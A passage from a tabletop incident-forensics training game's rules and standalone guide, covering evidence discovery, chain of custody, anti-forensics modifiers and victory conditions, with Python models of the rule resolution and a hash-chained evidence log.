  - Budget exhaustion is NOT a loss. The game continues to the turn limit: you may always take the cheap 5-Budget actions (Analyze Existing Evidence, Follow Investigative Lead, LOG-01, TIMELINE-01) while Budget lasts, and even at 0 Budget the team keeps playing (narrating connections, re-checking victory at game end). Victory conditions are still checked normally.

Penalty for Inconclusive Investigation:
  - Cannot feed findings into Hardening or Network Building modules
  - Audit & Compliance module must assess with incomplete information
  - Reduced confidence in future threat intelligence


Special Forensics Rules

Rule 1: Chain of Custody Tracking

Every Evidence card must be documented to maintain admissibility in legal proceedings.

Earning Chain of Custody (v2.2): +5% Chain of Custody every time an Evidence card is discovered AND the team states how it was preserved (hash, imaging, log export); the TO may award +10% for exemplary handling. This is in addition to any Chain of Custody impact printed on the Evidence card itself.

How It Works:
  - When an Evidence card is discovered, mark how it was obtained (which Investigation Action) and state how it was preserved
  - If chain of custody is broken (evidence obtained illegally or improperly), it becomes inadmissible
  - Inadmissible evidence cannot be used for Attribution or Timeline building
  - Cost to fix broken chain: 5 Budget + 1 turn to re-document evidence

Example:

Evidence "Admin Credentials Exfiltrated" discovered via "Memory Dump Analysis" (legal). Chain of custody: intact. Can be used in court. But if same evidence discovered via "Unauthorized System Access" by Blue Team (illegal), chain is broken and evidence is inadmissible.


Rule 2: Anti-Forensics Techniques

More sophisticated attacks may include anti-forensics measures that complicate investigation.

Anti-Forensics Examples:
  - Log deletion or manipulation
  - Encrypted communication channels
  - Malware that overwrites disk sectors
  - Timeline obfuscation (backdated files, timezone manipulation)

How It Works:
  - Threat Orchestrator can note that certain Investigation Actions are harder due to anti-forensics
  - Affected Investigation Cards gain +2 DC penalty if anti-forensics present
  - Example: "Evidence logs were deleted. Log Analysis (DC 11) now has DC 13."

Overcoming Anti-Forensics:
  - Investigators can use advanced techniques (Memory Forensics, Network Traffic Analysis) that bypass deleted logs
  - Alternatively, combine multiple Investigation Actions to corroborate timeline from different sources
  - Example: "Timeline can't be built from deleted logs, but network traffic shows exfiltration at 2:15 AM, and memory analysis shows C2 connection at 2:10 AM. We can reconstruct it."


Rule 3: Attacker Dwell Time

Represents how long the attacker remained in the network before detection or expulsion.

Mechanics (v2.2):
  - If the scenario states the attacker dwelled undetected 3+ turns (or the preceding Incident Response module ran 10+ turns), apply +1 DC to DISK and LOG investigations (evidence degraded).
  - Longer dwell time = more data exfiltrated, more persistence mechanisms installed, harder to attribute
  - But longer dwell also = more evidence: the TO may make 1-2 additional Evidence cards discoverable (more actions, more forensic artifacts)

Example:

Scenario states the attacker dwelled undetected for 4 turns before the investigation began. DISK-01, DISK-02, LOG-01, and LOG-02 all have +1 DC (evidence degraded over time). But the Blue Team can discover more Evidence cards (+2 cards total) due to the attacker's extended activity.


Rule 4: Incomplete Evidence

Some investigations may yield partial or fragmentary evidence that requires interpretation.

How It Works:
  - Partial success on Investigation roll = discover Evidence card marked "INCOMPLETE"
  - INCOMPLETE Evidence provides +1 Progress Meter advance but is NOT admissible alone for conclusions
  - Team can retry investigation next turn to complete the evidence (costs full Budget again)
  - Or team can interpret incomplete evidence by rolling d20+investigator skill vs. DC 12
    - Success: Use incomplete evidence as-is (risky but saves Budget)
    - Failure: Incomplete evidence leads to false conclusion (Red Herring card added)


Rule 5: No Double Counting (v2.2)

Investigation cards list meter advances AND discovered Evidence cards list their own meter impacts. Never apply both.

How It Works:
  - When an investigation discovers an Evidence card, apply ONLY the Evidence card's printed meter impacts.
  - The investigation card's own "Advance" line applies only when no Evidence card is produced — e.g., a partial success that yields fragments, or a success when no suitable undiscovered Evidence card remains.
  - The +5% Chain of Custody handling bonus (Rule 1, v2.2) still applies on top of the Evidence card's printed impacts — it rewards documentation, not discovery.
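The following Python model is an added example, not code from the Incident Zero repository: it encodes the Action A roll bands, the Investigation Duration rule (including the DISK-01 rush option), the Rule 1 handling bonus, Rule 5 (No Double Counting) and the v2.2 victory precedence. DC, Cost, Duration and the quoted EVD-01/EVD-07 impacts are the module's printed numbers; the DISK-01 advance line value is an assumption.

```python
"""Model of the Forensics Module v2.2 resolution rules (constructed example)."""
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

METERS = ("timeline", "chain", "attribution", "custody")  # the four Progress Meters


@dataclass
class Investigation:
    card: str
    dc: int
    cost: int
    duration: int
    advance: Dict[str, int]  # the card's own "Advance" line (used only without Evidence)


@dataclass
class Evidence:
    card: str
    impacts: Dict[str, int]  # printed meter impacts


# DC/Cost/Duration from the module's table; the advance line value is assumed.
DISK_01 = Investigation("DISK-01", dc=12, cost=10, duration=2, advance={"timeline": 10})
# Printed impacts as quoted in the module's worked examples.
EVD_01 = Evidence("EVD-01", {"chain": 15, "attribution": 10, "timeline": 10})
EVD_07 = Evidence("EVD-07", {"attribution": 30, "chain": 15, "timeline": 10})


def roll_band(total: int, dc: int) -> str:
    """Success at >= DC, partial at DC-2..DC-1, failure below DC-2 (v2.2 band)."""
    if total >= dc:
        return "success"
    if total >= dc - 2:
        return "partial"
    return "failure"


def resolution_turn(start_turn: int, duration: int) -> int:
    """Duration N resolves at the start of turn N, counting the start turn as 1."""
    return start_turn + duration - 1


@dataclass
class ForensicsGame:
    turn_limit: int
    budget: int = 75
    meters: Dict[str, int] = field(default_factory=lambda: {m: 0 for m in METERS})
    in_flight: Optional[Tuple[Investigation, int]] = None  # (card, turn it resolves)

    def advance(self, meter: str, amount: int) -> None:
        self.meters[meter] = min(100, self.meters[meter] + amount)

    def apply_evidence(self, ev: Evidence, preserved: bool) -> None:
        """Rule 5: only the Evidence card's printed impacts; Rule 1: +5% if preserved."""
        for meter, amount in ev.impacts.items():
            self.advance(meter, amount)
        if preserved:
            self.advance("custody", 5)

    def start_investigation(self, turn: int, inv: Investigation, rush: bool = False) -> int:
        """Pay the cost now; return the turn on which the roll and results arrive."""
        cost, duration = inv.cost, inv.duration
        if rush and inv.card == "DISK-01":  # v2.2 rush option: +5 Budget, Duration 1
            cost, duration = cost + 5, 1
        if duration >= 2 and self.in_flight is not None:
            raise ValueError("only one multi-turn investigation may be in flight")
        if self.budget < cost:
            raise ValueError("insufficient Budget")
        self.budget -= cost
        due = resolution_turn(turn, duration)
        if duration >= 2:
            self.in_flight = (inv, due)
        return due

    def resolve_investigation(self, inv: Investigation, total: int,
                              evidence: Optional[Evidence] = None,
                              preserved: bool = False) -> str:
        """Apply the roll: Evidence impacts on success, else the card's advance line."""
        if self.in_flight is not None and self.in_flight[0] is inv:
            self.in_flight = None
        band = roll_band(total, inv.dc)
        if band == "success" and evidence is not None:
            self.apply_evidence(evidence, preserved)
        elif band != "failure":
            # No Evidence card produced (partial, or none left undiscovered): advance line
            for meter, amount in inv.advance.items():
                self.advance(meter, amount)
        return band

    def victory(self, game_end: bool) -> Optional[str]:
        """V1, then V2, then V3 (V3 only at game end); no meter-minimum failure clause."""
        m = self.meters
        if m["attribution"] >= 90 and m["timeline"] >= 80:
            return "V1 Full Attribution"
        if m["timeline"] >= 80 and m["chain"] >= 80 and m["custody"] >= 70:
            return "V2 Solid Case"
        if game_end and sum(v >= 70 for v in m.values()) >= 2:
            return "V3 Partial Findings"
        return None

    def outcome(self, turn: int) -> str:
        """Victory is checked first; Budget exhaustion never ends the game."""
        game_end = turn >= self.turn_limit
        won = self.victory(game_end)
        if won:
            return won
        return "Inconclusive" if game_end else "In progress"
```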


Forensics Skill Modifiers

Base Skill Modifiers (apply to all Investigation rolls):

| Background | Modifier | Example |
|---|---|---|
| Forensic Analyst or Incident Responder | +2 | Person with formal training |
| IT Security or System Administrator | +1 | Technical background but not formal IR training |
| General IT | +0 | Basic tech knowledge |
| Non-Technical | -2 | No technical background |
| Forensics Researcher (GIAC GCFE, etc.) | +3 | Expert-level investigator |

Situational Modifiers:
  - +1: Detailed narrative explanation of investigation methodology
  - +2: Team describes investigation approach that references MITRE ATT&CK framework
  - +1: Prior Investigation Action discovered clues to current investigation
  - -2 (v2.2): Investigating hastily (team taking Forensics as last-ditch effort in final turn)
  - -2: Investigation approach is technically unsound or unrealistic


Forensics Module Standalone Setup

When playing Forensics as a standalone game (without prior IR/DR):

Setup Steps

  1. Threat Orchestrator Preparation (Secret):
     - Select attack scenario complexity (TIER 1-4)
     - Roll d4 for turn variation (-1, 0, 0, +1)
     - Secretly choose 3-5 Threat cards from core deck or expansions
     - Arrange threat cards in logical attack progression
     - Note which investigation techniques would discover each threat

  2. Blue Team Briefing:

     "You've been called to investigate a data breach discovered during routine system maintenance. Initial assessment:
       - Critical database server accessed 2 weeks ago
       - 5 million customer records potentially compromised
       - Attacker origin and motivations unknown
       - You have [TURN COUNT] turns to reconstruct the attack and find attribution clues.
       - Starting Budget: 75 (or 100 for well-funded incident response team)"

  3. Available Actions:
     - Conduct Investigation (as normal)
     - Analyze Existing Evidence
     - Follow Investigative Leads

  4. Victory Conditions (v2.2): Identical to campaign play — use the three canonical conditions in Victory & Failure Conditions:
     • V1 "Full Attribution": Attribution ≥90% AND Timeline ≥80%
     • V2 "Solid Case": Timeline ≥80% AND Attack Chain ≥80% AND Chain of Custody ≥70%
     • V3 "Partial Findings": any two meters ≥70% at game end

Module Combinations with Forensics

Recommended Sequences

Sequence 1: Detect & Investigate (90 minutes)
  - Incident Response (45 min) - Detect attack chain
  - Forensics (45 min) - Investigate and attribute

Sequence 2: Failure & Investigation (120 minutes)
  - Incident Response (45 min) - Fail to detect all threats
  - Disaster Recovery (45 min) - Manage breach crisis
  - Forensics (30 min) - Investigate for lessons learned

Sequence 3: Complete Lifecycle (180+ minutes)
  - Network Building (45 min) - Design initial network
  - Hardening (45 min) - Build defenses
  - Incident Response (45 min) - Test defenses
  - Disaster Recovery (45 min) - Handle failure
  - Forensics (30 min) - Investigate findings
  - Audit & Compliance (30 min) - Assess overall security posture


Debrief & Learning Outcomes

Post-Game Discussion Questions

After Forensics concludes, facilitate discussion around these questions:

Investigation Process:
  1. What investigation techniques were most revealing? Why?
  2. What evidence was most critical to understanding the attack?
  3. What was the attacker's most sophisticated technique? What made it hard to detect forensically?
  4. How would the investigation have been different with better logging? Better endpoint tools?

Attribution & Intelligence:
  1. What threat actor profile emerged? What's their likely motivation?
  2. What geographic or geopolitical clues do you see in the evidence?
  3. How would you share this intelligence with law enforcement or information sharing communities?

Hardening & Prevention:
  1. Based on forensic findings, what specific defenses would prevent this attack?
  2. How would your network design need to change to limit lateral movement?
  3. What logging and monitoring would have caught this earlier?

Real-World Connection:
  1. How does this scenario compare to actual breaches you've studied? (Verizon DBIR, Microsoft Security Incidents, etc.)
  2. What's the typical cost of forensic investigation in real incidents?
  3. How does attribution accuracy impact threat intelligence and policy response?


Technical Details & Implementation Notes

MITRE ATT&CK Integration

Each Investigation Action card and Evidence card should reference specific MITRE ATT&CK techniques/procedures:

Investigation Actions → Techniques Discovered:
  - Disk Forensics → T1005 (Data from Local System), T1025 (Data from Removable Media)
  - Memory Forensics → T1112 (Modify Registry), T1055 (Process Injection)
  - Log Analysis → T1071 (Application Layer Protocol), T1090 (Proxy)
  - Network Analysis → T1041 (Exfiltration Over C2 Channel), T1048 (Exfiltration Over Alternative Protocol)
  - Malware Analysis → T1104 (Multi-Stage Channels), T1059 (Command and Scripting Interpreter)
  - Timeline Reconstruction → T1074 (Data Staged), T1003 (OS Credential Dumping)
  - Attribution → G#### group / S#### software identification (threat attribution)

Forensics Difficulty Scaling

TIER 1 (6-8 turns): Unsophisticated attacker, plenty of artifacts, obvious malware
  - Low DC (10-12) Investigation Actions
  - Evidence cards plentiful and obvious
  - Chain of custody intact
  - No anti-forensics measures
  - Example: Script kiddie using public exploits, little cleanup

TIER 2 (8-10 turns): Standard attacker, some cleanup, moderate sophistication
  - Medium DC (12-14) Investigation Actions
  - Evidence cards present but require analysis
  - Some chain of custody concerns
  - Basic anti-forensics (log deletion)
  - Example: Credential theft ring, lateral movement, data exfil

TIER 3 (11-13 turns): Sophisticated attacker, significant obfuscation
  - High DC (13-15) Investigation Actions
  - Evidence requires correlation across multiple sources
  - Chain of custody significant challenge
  - Advanced anti-forensics (encryption, timeline spoofing)
  - Example: APT group with operational security discipline

TIER 4 (14-15 turns): Nation-state or elite attackers, expert anti-forensics
  - Very high DC (14-16+) Investigation Actions
  - Evidence heavily fragmented and incomplete
  - Chain of custody nearly impossible to prove
  - Sophisticated anti-forensics and counter-attribution
  - Example: State-sponsored APT with deep technical expertise


Printable Card Templates

See cards/forensics/core-deck/investigation-cards.md for printable Investigation Action cards.

See cards/forensics/core-deck/evidence-cards.md for printable Evidence and Findings cards.


Version History


Quick Reference

Setup: Select complexity tier, roll d4, announce turn count
Actions: Conduct Investigation (card cost, Duration 1-3 turns), Analyze Evidence (5 Budget, each Evidence card only once), Follow Leads (5 Budget)
Rolls: d20 vs. DC, with skill modifiers; partial success on DC-2 to DC-1
Durations (v2.2): Duration N resolves at the start of turn N, counting the starting turn as turn 1 (Duration 1 = immediate); only one multi-turn investigation in flight at a time
Resources: Budget (75 base, tracker 0-100), Turns (6-15), Progress Meters (4 tracked)
Victory (v2.2):
  - V1 "Full Attribution": Attribution ≥90% AND Timeline ≥80%
  - V2 "Solid Case": Timeline ≥80% AND Attack Chain ≥80% AND Chain of Custody ≥70%
  - V3 "Partial Findings": any two meters ≥70% at game end
Failure (v2.2): At the turn limit, no victory condition met. Victory conditions are checked first; there is no meter-minimum failure clause and budget exhaustion is not a loss.


v2.2 Playtest Edition Changes

  1. Canonical victory conditions. Four conflicting versions of the "complete case" condition (plus a fifth standalone-only condition) are replaced by one canonical set, stated identically here, in the Quick Reference, and in the standalone guide:
     - V1 "Full Attribution": Attribution ≥90% AND Timeline ≥80%
     - V2 "Solid Case": Timeline ≥80% AND Attack Chain ≥80% AND Chain of Custody ≥70%
     - V3 "Partial Findings": any two meters ≥70% at game end
     - Failure: at the turn limit, no victory condition met
     - Precedence: victory conditions are checked first. The "any meter <40% = failure" clause is deleted (it conflicted with V3). Budget exhaustion is not a loss. Meter "averages" are never used anywhere.
  2. Investigation Duration is now a real rule. Starting a Duration-N investigation occupies your action and Budget on the starting turn; results arrive at the start of turn N (counting the starting turn as turn 1) — Duration 1 resolves immediately. Only one multi-turn investigation in flight at a time. DISK-01's rush option is priced: pay +5 Budget to run it at Duration 1.
  3. Chain of Custody is earnable: +5% every time an Evidence card is discovered AND the team states how it was preserved (hash, imaging, log export); TO may award +10% for exemplary handling.
  4. Reachability math: printed CoC impacts on Evidence cards total +50% (EVD-08 +15, EVD-09 +10, EVD-10 +10, EVD-11 +10, EVD-12 +5). In a typical 8-10 turn game the team discovers 6-8 Evidence cards: 7 discoveries with stated preservation = +35% handling; if those include EVD-08, EVD-09, and EVD-11 that adds +35% printed, for 70% — the V2 threshold — without any exemplary awards. Exemplary handling (+10 instead of +5) or additional CoC-bearing cards push it higher. Under v2.1's printed-only gains, the ceiling was ~60% and V2 was mathematically unreachable.
  5. Analyze Existing Evidence costs 5 Budget, and each Evidence card can be Analyzed only once (it was a free, infinitely repeatable dominant action).
  6. Follow Investigative Lead has a printed cost: 5 Budget (examples previously charged 10 or 0).
  7. No Double Counting (Rule 5): when an investigation discovers an Evidence card, apply ONLY the Evidence card's printed meter impacts; the investigation card's advance line applies only when no Evidence card is produced (e.g., partial success).
  8. Partial-success band is DC-2 to DC-1 (matches all printed cards; the module previously said DC-3 to DC-1).
  9. Meter advance range widened to +5-35% — major breakthroughs can exceed +20% (cards already went to +35).
  10. One-Evidence rule now reads "unless the card says otherwise" (MEM-02 and NET-02 award two Evidence cards).
  11. Haste modifier is -2 everywhere (was -1 in one list). Anti-forensics example corrected to DC 13 (11 + 2). Dwell time redefined in turns: attacker dwelled undetected 3+ turns (or IR module ran 10+ turns) → +1 DC to DISK and LOG investigations.
  12. MITRE ATT&CK corrections across the module and card files (~12 wrong ID/name pairs fixed: T1005, T1074, T1112, T1040, T1055, T1059.001, T1556, T1027, and removal of irrelevant T1120/T1113/T1004 mappings).
  13. Credential and path errata: DISK-01 GCIH/GCFE (was CCNA-Security), MALW-01 GREM (was fictional "CRT"), EVD-10 registry path now includes \CurrentVersion.
  14. Budget tracker range is 0-100 (was "maximum useful 150"). Starting budget stays 75 (+25 optional).
  15. Deck summaries recounted from the actual cards: 12 Investigation, 12 Evidence, 4 Findings; evidence-type counts and the investigation→evidence flow map regenerated from the cards' Discovery Sources.

docs/standalone-games/forensics.md

Forensics Module: Standalone Game Guide

Version: 2.2 - Playtest Edition (rule changes marked "(v2.2)" — see the module rules doc for the full change list)
Duration: 45-90 minutes
Player Count: 1 Threat Orchestrator + 1-4 Investigators
Complexity: Intermediate to Advanced


Overview

This guide explains how to play the Forensics Module as a standalone game, without needing to have played Incident Response, Hardening, or Disaster Recovery first.

In standalone Forensics, you are a team of incident investigators called in to analyze a data breach. Your goal is to reconstruct the attack, discover the attacker's techniques, and if possible, attribute the breach to a known threat actor. This is a "detective" game focused on piecing together evidence rather than detecting or preventing attacks.


What You'll Learn


Game Components

Required Components

Optional Enhancements


Setup Instructions

Step 1: Choose Difficulty Tier

The Threat Orchestrator (game facilitator) selects an attack complexity tier. Do NOT tell the Blue Team the tier—it's secret.

Tier Turn Count Attack Type Example
TIER 1 (Beginner) 6-8 Script kiddie, basic malware Casual cybercriminal, obvious techniques
TIER 2 (Intermediate) 8-10 Organized attacker, some sophistication Credential theft ring, lateral movement
TIER 3 (Advanced) 11-13 Skilled APT, heavy obfuscation Sophisticated threat group with operational security
TIER 4 (Expert) 14-15 Nation-state, elite techniques State-sponsored APT with counter-forensics

Turn Count Randomization:
  - Choose a baseline turn count inside your tier's range (6-8, 8-10, 11-13, or 14-15)
  - Roll d4: -1, 0, 0, or +1
  - Add the result to the baseline to get the final turn count, and announce it
  - Example: TIER 2, baseline 9, d4 result of +1 = final turn count of 10 turns

Step 2: Prepare Threat Scenario

Secret TO Preparation:

  1. Select Attack Chain: Choose 3-5 Threat cards from the Incident Response core deck or expansion deck
     - Arrange them in logical progression (initial access → lateral movement → exfiltration)
     - Consider realistic attack flow: not every attack needs all phases
  2. Map Investigations: For each Threat card, note which Investigation Actions would discover it
     - Example: Malware persistence → Disk Forensics, Malware Analysis
     - Example: C2 communications → Network Traffic Analysis
     - Example: Credential abuse → Event Log Analysis
  3. Plan Evidence Discovery: Prepare which Evidence cards will be revealed as each Investigation Action succeeds
     - Not all investigations succeed (some are dead ends)
     - Some Evidence cards might be discovered by multiple investigation paths
  4. Set Attacker Profile: In your notes, decide:
     - Attacker motivation (cybercrime, espionage, hacktivism, nation-state)
     - Sophistication level (matches the tier)
     - Likely techniques (reference the MITRE ATT&CK framework)
     - Tools used (commercial, custom, open-source)

Example Secret Setup (TIER 2):

  - Threat Cards Selected: Phishing → Credential Harvesting → Lateral Movement → Persistence → Exfiltration
  - Turn Count: 8-10 (TIER 2, no roll modifier used)
  - Attacker Profile: Eastern European cybercriminal group focused on financial data theft
  - Key Evidence: Phishing email headers, malware samples, persistence mechanisms, C2 communications
  - Attribution Clues: Russian language in malware, specific tool signature, Bitcoin payment addresses
  - Investigation Challenge: Attacker deleted logs; Blue Team must reconstruct from network traffic and memory forensics

Step 3: Brief the Blue Team

Read the Incident Briefing to all investigators:

INCIDENT BRIEFING

"You've been called by [Company Name] to investigate a data breach discovered during routine system maintenance. Here's what we know so far:

Timeline of Discovery:
  - System administrator noticed unusual network traffic on [Date]
  - Forensic examination discovered evidence of system compromise dating back approximately [2-3 weeks / 1 month]
  - Data breach notification team estimates millions of records may have been accessed

What Was Affected:
  - Database servers containing customer information
  - Admin accounts showing unauthorized access
  - Backup systems with potential exfiltration evidence

Your Mission:
  - Reconstruct the complete attack chain (how did they get in? what did they do? how did they get out?)
  - Identify what data was compromised (scope and sensitivity)
  - Attribute the attack to a known threat group or attacker profile if possible
  - Produce findings for the company's security hardening and incident prevention

Resources Available:
  - Forensic laboratory time: 75 Budget units
  - [Optional: +25 if the company has cyber insurance or a threat intelligence subscription]
  - Investigation period: [TURN COUNT] turns (represents [1-3 weeks] of forensic work)

Regulatory Context:
  - Time-sensitive: Investigation results feed into breach notification requirements
  - Chain of custody critical: Findings must be admissible if this goes to law enforcement

You have [TURN COUNT] turns. Begin your investigation."

Step 4: Initialize Tracking

On a shared board or spreadsheet, create:

  1. Turn Tracker: Current turn = 1, Max turns = [TURN COUNT]
  2. Budget Tracker: Current budget = 75 (or 100), tracker range 0-100
  3. Progress Meters:
     - Timeline Completeness: 0%
     - Attack Chain Reconstruction: 0%
     - Attribution Confidence: 0%
     - Evidence Chain of Custody: 0%
  4. Evidence Log: Space to list discovered Evidence cards and their sources
  5. Investigation Record: Track which Investigation Actions have been attempted (successful and failed)

Turn Sequence

Each Turn Has 3 Steps

Step 1: Blue Team Describes Action (5 minutes)

One investigator (or the whole team collectively) describes what forensic investigation they want to perform.

Options:

Option A: Conduct Investigation
  - Choose an Investigation Action card (Disk Forensics, Memory Analysis, Log Analysis, Network Traffic, Malware Analysis, Timeline Reconstruction, or Threat Attribution)
  - Describe HOW they'll conduct the investigation (methodology, tools, expected findings)
  - Declare the Budget cost (shown on the card) — paid on the turn you start
  - Note the card's Duration (v2.2): starting the investigation is your action this turn; counting this turn as turn 1, the roll and results arrive at the START of turn N (Duration 1 = same turn, Duration 2 = start of next turn, Duration 3 = two turns later). Only ONE multi-turn investigation may be in flight at a time; you may take other actions while waiting.
  - Example: "We'll do a full disk image of the compromised database server and look for persistence mechanisms, rootkits, and artifact evidence. Cost 10 Budget, Duration 2 — results at the start of next turn."

Option B: Analyze Existing Evidence — Cost: 5 Budget (v2.2)
  - Review 2-4 Evidence cards already discovered; each Evidence card can be Analyzed only once (v2.2), so mark reviewed cards as Analyzed
  - Describe connections between findings (temporal sequence, technical relationships, or attribution links)
  - Example: "The malware sample matches the persistence mechanism we found in scheduled tasks, suggesting the attacker knew exactly what they were doing. Plus, the C2 domain was registered by the same person who registered two other domains we found in old breach reports."

Option C: Follow Investigative Lead — Cost: 5 Budget (v2.2)
  - Pick an Evidence card with an "Investigative Lead" noted
  - Describe how you'll pursue this lead
  - Example: "This C2 domain resolves to a Russian ASN. Let's do a WHOIS lookup and see what other domains are hosted on this infrastructure."


Step 2: TO Rolls & Resolves (2-3 minutes)

For Conduct Investigation or Follow Investigative Lead:

  1. Verify Cost: Check that the Blue Team has sufficient Budget (Follow Lead costs 5 — v2.2)
     - If Budget is insufficient, the investigation cannot proceed (suggest an alternative action)
  2. Apply Duration (v2.2): For a Duration 2-3 investigation, the cost and action are spent now, but steps 3-6 happen at the START of the turn the investigation completes (Duration 1 resolves immediately)
  3. Set Difficulty Class (DC): TO checks the Investigation Action card for its DC
     - Example: Disk Forensics has DC 12
     - +2 DC if anti-forensics is present
     - +1-2 DC if the attacker was sophisticated
     - +1 DC to DISK and LOG investigations if the attacker dwelled undetected for 3+ turns (v2.2 dwell-time rule)
  4. Determine Modifiers: Apply skill modifiers to the roll
     - +2 if the investigator has a forensics certification
     - +1 if basic IT security background
     - +2 if the team provides a detailed technical narrative
     - +1 if a previous investigation discovered clues to this action
     - -2 if attempting hastily (rushed, final-turn desperation) (v2.2)
  5. Roll: Investigator (or TO on their behalf) rolls d20
  6. Compare Results (modified roll vs. DC):
     - Success (roll ≥ DC): Discover ONE Evidence card (unless the card says otherwise — MEM-02 and NET-02 award TWO) and apply ONLY that Evidence card's printed meter impacts (typically +5-35% per meter; major breakthroughs can exceed +20%). The investigation card's own advance line applies only if no Evidence card is produced (v2.2: No Double Counting)
     - Partial Success (roll DC-2 to DC-1): Discover partial or incomplete evidence + apply the investigation card's partial advance line (typically +5-15%)
     - Failure (roll < DC-2): No evidence discovered; Budget still spent; the turn is used

For Analyze Existing Evidence:

  1. Pay Cost: 5 Budget (v2.2); the 2-4 Evidence cards reviewed must not have been Analyzed before
  2. Describe Connection: Blue Team explains how the findings are related
  3. Roll: d20 + investigator skill modifier vs. DC 10
  4. Results:
     - Success (≥10): Gain insight; advance two Progress Meters by 5-10% each
     - Failure (<10): No progress; the turn is used (Budget still spent)

Step 3: Record & Update Tracking (1-2 minutes)

  1. Deduct Budget: Subtract action cost from Budget Tracker
  2. Advance Turn: Increment Turn counter by 1
  3. Update Progress Meters: Record any progress from resolved investigations
  4. Note Evidence: If Evidence card discovered, add to Evidence Log with source and chain of custody status
  5. Chain of Custody (v2.2): +5% Chain of Custody for each Evidence card discovered this turn IF the team stated how it was preserved (hash, imaging, log export); TO may award +10% for exemplary handling
  6. Check Victory Condition: Did Blue Team achieve any victory condition? (see Victory Conditions section)
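The Evidence Log and the Chain of Custody bonus above reward stating how each artifact was preserved (hash, imaging, log export). The following Python evidence log is an added example, not part of the game's files or RetroVerse Studios' code: it records the SHA-256 of each artifact at acquisition, and hash-chains the entries so that an edited or removed entry is detectable on later review. The card IDs match the worked example later in this guide; the artifact bytes, handler names and timestamps are constructed sample data.

```python
"""Evidence Log with a hash-chained chain of custody.

Added example for this guide, not RetroVerse Studios' code. Every entry records the
SHA-256 of the artifact when it was acquired, and each entry carries the hash of the
previous entry, so verify() catches both a changed artifact and a tampered log.
The artifact bytes, handlers and timestamps below are constructed sample data.
"""
import hashlib
import json

GENESIS = "0" * 64  # link value carried by the first entry of a log


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def entry_hash(entry: dict) -> str:
    """Hash every field except the entry's own hash, in canonical JSON order."""
    body = {k: v for k, v in entry.items() if k != "entry_hash"}
    return sha256_hex(json.dumps(body, sort_keys=True).encode())


def log_evidence(log, card, source, artifact, handler, preservation, acquired):
    """Append an Evidence Log entry linked to the previous entry; returns it."""
    entry = {
        "card": card,                  # Evidence card ID, e.g. EVD-04
        "source": source,              # Investigation Action that produced it
        "handler": handler,
        "acquired": acquired,          # ISO-8601 UTC timestamp supplied by the caller
        "sha256": sha256_hex(artifact),
        "size": len(artifact),
        "preservation": preservation,  # how it was preserved: hash, image, export
        "prev": log[-1]["entry_hash"] if log else GENESIS,
    }
    entry["entry_hash"] = entry_hash(entry)
    log.append(entry)
    return entry


def verify(log, artifacts):
    """Return the problems found: altered or missing log entries and changed artifacts."""
    problems, prev = [], GENESIS
    for e in log:
        if e["prev"] != prev or entry_hash(e) != e["entry_hash"]:
            problems.append(f"{e['card']}: log entry altered or out of sequence")
        if sha256_hex(artifacts.get(e["card"], b"")) != e["sha256"]:
            problems.append(f"{e['card']}: artifact no longer matches acquisition hash")
        prev = e["entry_hash"]
    return problems


# Constructed stand-ins for the artifacts behind the worked example's first two cards.
ARTIFACTS = {
    "EVD-04": (b"4624,2024-03-04T02:10:00Z,svc_backup,10.0.0.9\n"   # sample log export
               b"4672,2024-03-04T02:10:01Z,svc_backup,10.0.0.9\n"),
    "EVD-02": b"2024-03-04T02:30:00Z 10.0.5.12 -> 203.0.113.7:443 TLS beacon\n",  # sample capture summary
}


def build_example_log():
    log = []
    log_evidence(log, "EVD-04", "LOG-01", ARTIFACTS["EVD-04"], "analyst-1",
                 "signed event log export, SHA-256 recorded", "2024-03-05T09:00:00Z")
    log_evidence(log, "EVD-02", "MALW-01", ARTIFACTS["EVD-02"], "analyst-2",
                 "sandbox capture archived, SHA-256 recorded", "2024-03-06T09:00:00Z")
    return log


def tamper_demo():
    """Change one artifact after acquisition, then drop the first log entry."""
    log = build_example_log()
    altered = dict(ARTIFACTS)
    altered["EVD-02"] = ARTIFACTS["EVD-02"].replace(b"203.0.113.7", b"198.51.100.9")
    artifact_problems = verify(log, altered)   # the capture was edited after acquisition
    del log[0]                                 # the first entry "goes missing"
    chain_problems = verify(log, ARTIFACTS)    # EVD-02's prev link no longer matches
    return artifact_problems, chain_problems
```

Hashing at acquisition is what turns "we preserved it" into something a later reviewer can check; the chained entry hashes are the cheap version of the custody transfers a real log would record, and a clean verify() on the untouched log is the check to run before handing evidence to anyone else.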

Investigation Actions & Evidence

Investigation Action Cards (Quick Reference)

Card                                    DC  Cost  Duration  What It Reveals
DISK-01: Disk Image & Analysis          12  10    2 turns   Deleted files, malware samples, persistence mechanisms
DISK-02: File System Carving            14  15    3 turns   Deep file recovery, hidden artifacts, encrypted data
MEM-01: Memory Dump & Analysis          13  15    2 turns   Volatile processes, injected code, C2 connections
MEM-02: Memory Forensics Deep Dive      15  20    3 turns   Malware behavior analysis, encryption keys, exploits
LOG-01: Event Log Analysis              11   5    1 turn    User login timeline, privilege escalation, admin actions
LOG-02: Deep Log Correlation            13  10    2 turns   Cross-system timeline, attack sequence, lateral movement
NET-01: Network Traffic Analysis        12  10    2 turns   Exfiltration evidence, C2 communications, data flows
NET-02: Packet Capture Deep Analysis    14  15    3 turns   Protocol forensics, attacker tools, communication patterns
MALW-01: Malware Analysis (Dynamic)     12  15    2 turns   Behavior analysis, IOCs, capabilities
MALW-02: Malware Analysis (Static)      14  10    2 turns   Code reverse engineering, attacker signatures, techniques
TIMELINE-01: Timeline Reconstruction    13   5    1 turn    Chronological attack sequence, entry and exit points
THREAT-01: Threat Attribution Analysis  15  20    3 turns   Link to known threat groups, TTPs, motivation

DISK-01 rush option (v2.2): pay +5 Budget (15 total) to run it at Duration 1. Duration rule: results arrive at the start of the turn the Duration completes — see Turn Sequence.


Victory & Failure Conditions

Investigation Complete (VICTORY)

Blue Team wins if they achieve ONE of these (canonical v2.2 conditions — identical to the module rules):

Victory Condition 1: "Full Attribution"
  - Attribution Confidence ≥ 90% AND Timeline Completeness ≥ 80%
  - Result: "You have successfully attributed this attack to [Threat Group]. Intelligence briefing prepared for leadership."

Victory Condition 2: "Solid Case"
  - Timeline Completeness ≥ 80% AND Attack Chain Reconstruction ≥ 80% AND Evidence Chain of Custody ≥ 70%
  - Result: "Your forensic investigation is publishable quality and legally defensible. Law enforcement briefed."

Victory Condition 3: "Partial Findings"
  - Any two Progress Meters ≥ 70% at game end
  - Result: "Investigation concluded with sufficient findings for remediation. Hardening team can now implement controls."


